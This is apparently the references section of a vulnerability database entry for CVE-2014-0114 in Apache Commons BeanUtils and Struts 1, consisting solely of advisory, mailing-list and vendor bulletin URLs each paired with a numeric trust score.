url:https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/59480

Trust: 1.6

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676091

Trust: 1.6

url:https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/59246

Trust: 1.6

url:http://secunia.com/advisories/59245

Trust: 1.6

url:http://secunia.com/advisories/59479

Trust: 1.6

url:http://secunia.com/advisories/59118

Trust: 1.6

url:https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html

Trust: 1.6

url:http://secunia.com/advisories/58947

Trust: 1.6

url:https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://bugzilla.redhat.com/show_bug.cgi?id=1091938

Trust: 1.6

url:https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html

Trust: 1.6

url:https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/59014

Trust: 1.6

url:https://bugzilla.redhat.com/show_bug.cgi?id=1116665

Trust: 1.6

url:http://secunia.com/advisories/58710

Trust: 1.6

url:https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675387

Trust: 1.6

url:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html

Trust: 1.6

url:https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html

Trust: 1.6

url:http://www.securityfocus.com/archive/1/534161/100/0/threaded

Trust: 1.6

url:https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e

Trust: 1.6

url:http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt

Trust: 1.6

url:https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/59464

Trust: 1.6

url:https://access.redhat.com/errata/rhsa-2018:2669

Trust: 1.6

url:https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e

Trust: 1.6

url:https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755

Trust: 1.6

url:http://marc.info/?l=bugtraq&m=140119284401582&w=2

Trust: 1.6

url:http://marc.info/?l=bugtraq&m=141451023707502&w=2

Trust: 1.6

url:http://secunia.com/advisories/59228

Trust: 1.6

url:https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e

Trust: 1.6

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676931

Trust: 1.6

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676375

Trust: 1.6

url:https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/60177

Trust: 1.6

url:https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://www.mandriva.com/security/advisories?name=mdvsa-2014:095

Trust: 1.6

url:https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/60703

Trust: 1.6

url:https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/59718

Trust: 1.6

url:https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Trust: 1.6

url:https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e

Trust: 1.6

url:http://marc.info/?l=bugtraq&m=140801096002766&w=2

Trust: 1.6

url:https://security.netapp.com/advisory/ntap-20180629-0006/

Trust: 1.6

url:https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e

Trust: 1.6

url:https://access.redhat.com/solutions/869353

Trust: 1.6

url:https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

Trust: 1.6

url:https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01

Trust: 1.4

url:https://rhn.redhat.com/errata/rhsa-2014-0497.html

Trust: 1.2

url:https://rhn.redhat.com/errata/rhsa-2014-0498.html

Trust: 1.0

url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755

Trust: 1.0

url:http://www.liferay.com/community/security-team/known-vulnerabilities/-/asset_publisher/t8ei/content/cst-sa-lps-46552-struts-1-classloader-manipulation

Trust: 0.9

url:http://kb.juniper.net/infocenter/index?page=content&id=jsa10643&cat=sirt_1&actp=list

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21674435

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21674428

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21674937

Trust: 0.9

url:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04311273

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675822

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21673663

Trust: 0.9

url:http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-018/index.html

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21672316

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21676375

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21673098

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21673944

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21673101

Trust: 0.9

url:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04399728

Trust: 0.9

url:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04473828

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg1iv61061

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21680848

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21676646

Trust: 0.9

url:http://struts.apache.org/release/2.3.x/docs/s2-021.html

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg27042186

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg27042185

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg27042184

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg1iv61039

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg1iv61058

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg24037507

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21678830

Trust: 0.9

url:http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-020/index.html

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg24037825

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg24037409

Trust: 0.9

url:http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg24037506

Trust: 0.9

url:https://rhn.redhat.com/errata/rhsa-2014-0500.html

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004807

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21673757

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21673508

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21673695

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674099

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674104

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21673992

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674110

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21673982

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21673422

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21678359

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21680716

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21675387

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21677802

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674310

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21674191

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674017

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674016

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674339

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21677449

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675496

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21676485

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21677298

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21674613

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21676091

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21673878

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21673877

Trust: 0.9

url:https://www-304.ibm.com/support/docview.wss?uid=swg21674113

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674905

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21679331

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21680698

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg24037424

Trust: 0.9

url:http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21680194

Trust: 0.9

url:http://jvn.jp/en/jp/jvn30962312/index.html

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21677352

Trust: 0.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg24037622

Trust: 0.9

url:https://nvd.nist.gov/vuln/detail/cve-2014-0114

Trust: 0.8

url:http://jvn.jp/vu/jvnvu96290700/index.html

Trust: 0.8

url:https://www.us-cert.gov/ics/recommended-practices

Trust: 0.8

url:https://www.us-cert.gov/ics/advisories/icsma-20-184-01

Trust: 0.8

url:https://www.fda.gov/medical-devices/digital-health/cybersecurity

Trust: 0.8

url:http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-000056.html

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0114

Trust: 0.8

url:https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3cdev.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3cnotifications.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3csolr-user.lucene.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3cnotifications.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3ccommits.pulsar.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3ccommits.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3csolr-user.lucene.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3ccommits.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3cissues.activemq.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3cissues.activemq.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3cgitbox.activemq.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3cdev.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477@%3ccommits.dolphinscheduler.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3ccommits.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3cdevnull.infra.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3cannounce.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3cdev.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3cissues.activemq.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3cuser.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e

Trust: 0.6

url:https://www-304.ibm.com/support/docview.wss?uid=swg21674379www-01.ibm.com/support/docview.wss?uid=swg21677335

Trust: 0.6

url:https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3cdev.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3cissues.commons.apache.org%3e

Trust: 0.6

url:https://www-01.ibm.com/support/docview.wss?uid=ibm10795183

Trust: 0.6

url:http://www.ibm.com/support/docview.wss?uid=ibm10872142

Trust: 0.6

url:https://issues.apache.org/jira/browse/beanutils-520

Trust: 0.6

url:https://www.mail-archive.com/announce@apache.org/msg05413.html

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10887121

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10957873

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10887119

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10887113

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10888007

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10887999

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10887973

Trust: 0.6

url:https://www.ibm.com/support/docview.wss?uid=ibm10888009

Trust: 0.6

url:https://www.auscert.org.au/bulletins/75922

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-3/

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-2/

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2019.2568/

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation/

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2020.1427/

Trust: 0.6

url:https://www.ibm.com/support/pages/node/6494701

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-warehouse-has-released-a-fix-in-response-to-multiple-vulnerabilities-found-in-ibm-db2/

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2019.2355/

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-identified-in-ibm-storediq/

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-db2-that-affect-the-ibm-performance-management-product/

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db2-and-ibm-java-runtime-affect-ibm-spectrum-protect-server/

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-open-source-used-in-ibm-cloud-pak-system/

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2020.2293.2/

Trust: 0.6

url:http://www.ibm.com/support/docview.wss?uid=ibm10879093

Trust: 0.6

url:https://www-01.ibm.com/support/docview.wss?uid=ibm10872142

Trust: 0.6

url:https://www.auscert.org.au/bulletins/78218

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2019.3134/

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2022072128

Trust: 0.6

url:https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-workspace-is-affected-by-security-vulnerabilities-3/

Trust: 0.6

url:http://struts.apache.org/

Trust: 0.3

url:https://www-304.ibm.com/support/docview.wss?uid=swg21674379

Trust: 0.3

url:www-01.ibm.com/support/docview.wss?uid=swg21677335

Trust: 0.3

url:https://www.redhat.com/mailman/listinfo/rhsa-announce

Trust: 0.2

url:https://bugzilla.redhat.com/):

Trust: 0.2

url:https://access.redhat.com/security/team/contact/

Trust: 0.2

url:https://access.redhat.com/security/updates/classification/#important

Trust: 0.2

url:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/

Trust: 0.2

url:http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Trust: 0.2

url:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2014-0050

Trust: 0.2

url:https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.esb.enterprise&downloadtype=securitypatches&version=7.1.0

Trust: 0.1

url:https://www.redhat.com/security/data/cve/cve-2014-0114.html

Trust: 0.1

url:http://www.openwall.com/ove/

Trust: 0.1

url:http://creativecommons.org/licenses/by-sa/2.5

Trust: 0.1

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0114

Trust: 0.1

url:https://security.gentoo.org/

Trust: 0.1

url:https://bugs.gentoo.org.

Trust: 0.1

url:https://issues.jboss.org/):

Trust: 0.1

url:https://access.redhat.com/security/cve/cve-2014-0114

Trust: 0.1

url:https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=jboss.amq.broker&version=7.5.0

Trust: 0.1

url:https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/

Trust: 0.1

url:https://softwaresupport.hpe.com>.

Trust: 0.1

url:https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets

Trust: 0.1

url:http://www.hpe.com/support/security_bulletin_archive

Trust: 0.1

url:https://www.hpe.com/info/report-security-vulnerability

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2016-0763

Trust: 0.1

url:http://www.hpe.com/support/subscriber_choice

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-3253

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-0107

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-6429

Trust: 0.1

